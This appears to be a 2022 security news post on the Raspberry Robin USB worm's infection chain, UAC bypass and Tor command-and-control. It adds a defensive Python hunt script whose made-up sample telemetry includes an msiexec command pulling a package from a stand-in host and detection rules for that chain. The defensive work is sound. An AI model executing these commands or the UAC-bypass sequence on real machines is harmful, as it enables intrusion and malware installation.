Sunday, May 15, 2022
Researchers Warn of ‘Raspberry Robin’ Malware Spreading through Exterior Drives

Cybersecurity researchers have found a new Windows malware with worm-like capabilities that is propagated by means of removable USB devices.

Attributing the malware to a cluster named "Raspberry Robin," Red Canary researchers noted that the worm "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL."

The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to the technology and manufacturing sectors.

Attack chains pertaining to Raspberry Robin begin with connecting an infected USB drive to a Windows machine. Present within the device is the worm payload, which appears as a .LNK shortcut file to a legitimate folder.

Raspberry Robin

The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive.

This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for external network communication to a rogue domain for command-and-control (C2) purposes and to download and install a DLL library file.

The malicious DLL is subsequently loaded and executed using a chain of legitimate Windows utilities such as fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, effectively bypassing User Account Control (UAC).

Also common across Raspberry Robin detections is the presence of outbound C2 contact involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses associated with Tor nodes.
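The behaviours described in the preceding paragraphs (cmd.exe executing a file from an external drive, msiexec.exe reaching out to a remote host, the fodhelper.exe to rundll32.exe to odbcconf.exe chain, and outbound connections from regsvr32.exe, rundll32.exe or dllhost.exe to Tor nodes) map naturally onto endpoint telemetry rules. The following is an added detection example written for this page; it is not Red Canary's detection logic or any code from the malware. It assumes Sysmon-style process-creation and network-connection events (shape constructed here), assumes the msiexec download shows up as a URL on the command line, and uses TEST-NET addresses as a stand-in for a real Tor node feed.

```python
"""Hunt rules for the Raspberry Robin behaviours described above.

Added example, not Red Canary's detection content. Event records below are
constructed to resemble Sysmon process-creation (EventID 1) and
network-connection (EventID 3) events; the Tor node list is a placeholder.
"""
import re

# Placeholder for a Tor node feed (TEST-NET addresses, constructed).
TOR_NODES = {"198.51.100.23", "203.0.113.7"}
# Processes the article names as sources of outbound C2 traffic.
C2_PROCESSES = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}
# Drive letters other than the system volume (assumed to be C:).
NON_SYSTEM_DRIVE = re.compile(r"\b[d-z]:\\")

# Constructed sample telemetry; PIDs, paths, domain and IPs are made up
# (the domain uses the reserved .invalid TLD).
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": "explorer.exe",
     "cmdline": "explorer.exe"},
    # cmd.exe reading and executing a file on a non-system (removable) drive
    {"type": "process", "pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "E:\\Recovery\\update.cmd"'},
    # msiexec.exe fetching a package from a remote host
    {"type": "process", "pid": 300, "ppid": 200, "image": "msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://q.example.invalid/pkg.msi"},
    # fodhelper -> rundll32 -> rundll32 -> odbcconf chain
    {"type": "process", "pid": 400, "ppid": 300, "image": "fodhelper.exe",
     "cmdline": "fodhelper.exe"},
    {"type": "process", "pid": 500, "ppid": 400, "image": "rundll32.exe",
     "cmdline": "rundll32.exe"},
    {"type": "process", "pid": 600, "ppid": 500, "image": "rundll32.exe",
     "cmdline": "rundll32.exe"},
    {"type": "process", "pid": 700, "ppid": 600, "image": "odbcconf.exe",
     "cmdline": "odbcconf.exe"},
    # benign controls: a local msiexec install and a browser connection
    {"type": "process", "pid": 900, "ppid": 100, "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Temp\\setup.msi"},
    {"type": "network", "pid": 800, "image": "regsvr32.exe",
     "dst_ip": "198.51.100.23"},
    {"type": "network", "pid": 950, "image": "chrome.exe",
     "dst_ip": "198.51.100.23"},
]


def ancestor_images(pid, procs):
    """Lower-cased image names walking up the parent chain from pid (inclusive)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:  # seen-set guards PID reuse loops
        seen.add(pid)
        chain.append(procs[pid]["image"].lower())
        pid = procs[pid]["ppid"]
    return chain


def detect(events):
    """Return (rule_name, pid) findings for the four behaviours in the article."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for p in procs.values():
        img, cl = p["image"].lower(), p["cmdline"].lower()
        parents = ancestor_images(p["ppid"], procs)
        # explorer.exe -> cmd.exe executing content from a non-system drive
        if img == "cmd.exe" and parents[:1] == ["explorer.exe"] \
                and NON_SYSTEM_DRIVE.search(cl):
            findings.append(("cmd_runs_file_from_removable_drive", p["pid"]))
        # Windows Installer pointed at a remote package (assumed URL form)
        if img == "msiexec.exe" and re.search(r"https?://", cl):
            findings.append(("msiexec_fetches_remote_package", p["pid"]))
        # rundll32/odbcconf descending from fodhelper.exe (UAC bypass chain)
        if img in {"rundll32.exe", "odbcconf.exe"} and "fodhelper.exe" in parents:
            findings.append(("fodhelper_uac_bypass_chain", p["pid"]))
    for e in events:
        # signed Windows binaries talking to known Tor nodes
        if e["type"] == "network" and e["image"].lower() in C2_PROCESSES \
                and e["dst_ip"] in TOR_NODES:
            findings.append(("lolbin_outbound_to_tor_node", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40} pid={pid}")
```

The parent-chain rule is the most durable of the four, since it keys on process lineage rather than on command-line strings an operator can vary; the URL and drive-letter heuristics are cheap first-pass filters that should be paired with a check for the removable-media origin of the executed file where the telemetry source exposes it.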

That said, the operators' objectives remain unanswered at this stage. It's also unclear how and where the external drives are infected, although it's suspected that it's done offline.

"We also don't know why Raspberry Robin installs a malicious DLL," the researchers said. "One hypothesis is that it may be an attempt to establish persistence on an infected system."
